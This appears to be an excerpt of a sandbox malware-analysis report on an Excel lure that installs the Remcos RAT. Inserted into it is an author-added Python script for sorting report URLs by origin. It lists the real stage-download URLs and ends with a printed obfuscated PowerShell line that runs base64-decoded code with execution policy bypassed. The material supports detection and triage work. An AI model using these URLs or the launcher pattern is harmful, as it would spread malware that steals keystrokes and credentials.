                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C204000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000001A.00000002.512058781.0000000000459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: RegAsm.exe, 0000001A.00000002.511865097.00000000003FC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/uK
                Source: RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://www.msn.com/
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                Source: RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: RegAsm.exe, 00000015.00000002.515513667.0000000000203000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.netX
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://contextual.media.net/
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                Source: powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: powershell.exe, 0000000E.00000002.505047293.00000000025D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org
                Source: powershell.exe, 0000000C.00000002.524628832.00000000027A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_
                Source: powershell.exe, 0000000E.00000002.505011159.0000000001E54000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521079738.000000001AB7A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C282000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.504984898.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C1A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C1FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521079738.000000001ABB1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                Source: RegAsm.exe, 00000015.00000002.516533065.0000000002378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476695899.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zeep.ly/
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zeep.ly/c
                Source: mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474232984.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474574663.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003752000.00000004.00000020.00020000.00000000.sdmp, RFQ_0230909024SEPT.xla.xlsx, B3930000.0.drString found in binary or memory: https://zeep.ly/yDfvh
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49165 version: TLS 1.2
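The "String found in binary or memory" rows above mix three very different kinds of URL, and reading them as a flat IOC list is the usual mistake. The rows sourced only from bhv1E0C.tmp.21.dr are the contents of a temp file dropped by process 21 that holds what looks like Internet Explorer's cached msn.com start page (note ocid=iehp) and its ad trackers; the OCSP/CPS addresses carried by mshta.exe and powershell.exe come out of DER-encoded certificates in memory, which is why they end in stray bytes such as "com0", "com0%" or "net03" (the ASN.1 length byte that follows the URL); and one-character overruns such as "zeep.ly/c", "imvu.comr" or "nirsoft.netX" are the string scanner running into adjacent bytes. What is left once those are set aside is the delivery chain: https://zeep.ly/yDfvh, present in the xlsx itself and in mshta.exe, and https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg, present in powershell.exe. The RegAsm.exe-only strings (nirsoft.net, imvu.com, ebuddy.com, the Google and Yahoo login pages) are baked into the injected RAT image and are not network indicators. The following script is an added triage example and is not part of the Joe Sandbox report; it parses rows in exactly the shape shown above, strips the ASN.1 tail from hostnames, and sorts each host into one of four categories. The category names and the noise suffix list are the author's choices, and the sample rows are a constructed, shortened subset of the report.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: six rows in the shape of the report's "String found in binary or memory"
# lines (memory-region lists shortened). Not a complete copy of the report.
REPORT_LINES = [
    "Source: bhv1E0C.tmp.21.drString found in binary or memory: http://www.msn.com/?ocid=iehp",
    "Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, "
    "powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp"
    "String found in binary or memory: http://ocsp.comodoca.com0%",
    "Source: powershell.exe, 0000000E.00000002.505011159.0000000001E54000.00000004.00000020.00020000.00000000.sdmp"
    "String found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg",
    "Source: mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmp, "
    "RFQ_0230909024SEPT.xla.xlsx, B3930000.0.drString found in binary or memory: https://zeep.ly/yDfvh",
    "Source: RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmp"
    "String found in binary or memory: http://www.nirsoft.net/",
    "Source: powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmp"
    "String found in binary or memory: https://contoso.com/License",
]

LINE_RE = re.compile(r"^Source:\s*(?P<src>.*?)String found in binary or memory:\s*(?P<url>\S+)\s*$")
# Joe Sandbox memory-region ids: <proc>.<phase>.<dump>.<address>.<...>.sdmp, all hex fields.
REGION_RE = re.compile(r"^[0-9a-f]{8}(\.[0-9a-f]+)+\.sdmp$", re.I)
# A URL lifted out of a DER certificate carries the next ASN.1 length byte: "...com0", "...net03", "...com0%".
ASN1_TAIL_RE = re.compile(r"^(?P<host>.+\.[a-z]{2,})0[%\-/0-9a-f]?$")
# Hosts present in almost every Windows/.NET memory dump; no attribution value (author's list).
NOISE_HOST_SUFFIXES = ("comodoca.com", "comodo.com", "entrust.net", "digicert.com.my",
                       "diginotar.nl", "xmlsoap.org", "contoso.com", "nuget.org")


def parse_line(line):
    """Split one report row into (process/file names, raw URL); None for rows of another kind."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    parts = [p.strip() for p in m.group("src").split(",")]
    procs = sorted({p for p in parts if p and not REGION_RE.match(p)})
    return procs, m.group("url")


def normalize_host(url):
    """Lower-case host with any glued-on ASN.1 length byte removed."""
    host = urlsplit(url).netloc.lower()
    m = ASN1_TAIL_RE.match(host)
    return m.group("host") if m else host


def classify(procs, host):
    if procs and all(p.startswith("bhv") for p in procs):
        return "browser-cache"      # dropped IE cache file (msn.com, ad/CDN URLs): unrelated to the sample
    if host.endswith(NOISE_HOST_SUFFIXES):
        return "pki-or-framework"   # OCSP/CPS URLs from certificate blobs, .NET and NuGet template strings
    if procs and all(p == "RegAsm.exe" for p in procs):
        return "payload-static"     # strings baked into the injected RAT image (NirSoft-style recovery code)
    return "stage-download"         # seen in the xlsx / mshta / powershell chain: candidate delivery IOCs


def triage(lines):
    """Group URLs by category and host, remembering which processes or files carried them."""
    out = defaultdict(lambda: defaultdict(lambda: {"urls": set(), "procs": set()}))
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        procs, url = parsed
        host = normalize_host(url)
        entry = out[classify(procs, host)][host]
        entry["urls"].add(url)
        entry["procs"].update(procs)
    return out


def stage_hosts(lines):
    """Hosts worth blocking and hunting for: those seen only through the delivery chain."""
    return sorted(triage(lines)["stage-download"])


if __name__ == "__main__":
    for category, hosts in triage(REPORT_LINES).items():
        print(f"[{category}]")
        for host, info in sorted(hosts.items()):
            print(f"  {host:32} via {', '.join(sorted(info['procs']))}")
```

Run against the full row list of a report, the "stage-download" bucket is the one to feed into blocklists and retro-hunts; the other three are explained by the host environment, the certificate chain, or the malware family's embedded tooling strings. Hosts that legitimately end in a digit would be mangled by the tail-stripping heuristic, so review that bucket by eye before acting on it.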

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000017_2_0040A2F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,17_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_004168FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,21_2_0040987A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,21_2_004098E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,23_2_00406DFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00406E9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,26_2_004068B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,26_2_004072B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,17_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,17_2_0040A41B
                Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR

                E-Banking Fraud

                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.624187857.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0041CA73 SystemParametersInfoW

                System Summary

                Source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: RFQ_0230909024SEPT.xla.xlsx | OLE: Microsoft Excel 2007+
                Source: B3930000.0.dr | OLE: Microsoft Excel 2007+
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetcateudpationprocess[1].hta
                Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 9302
                Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))"
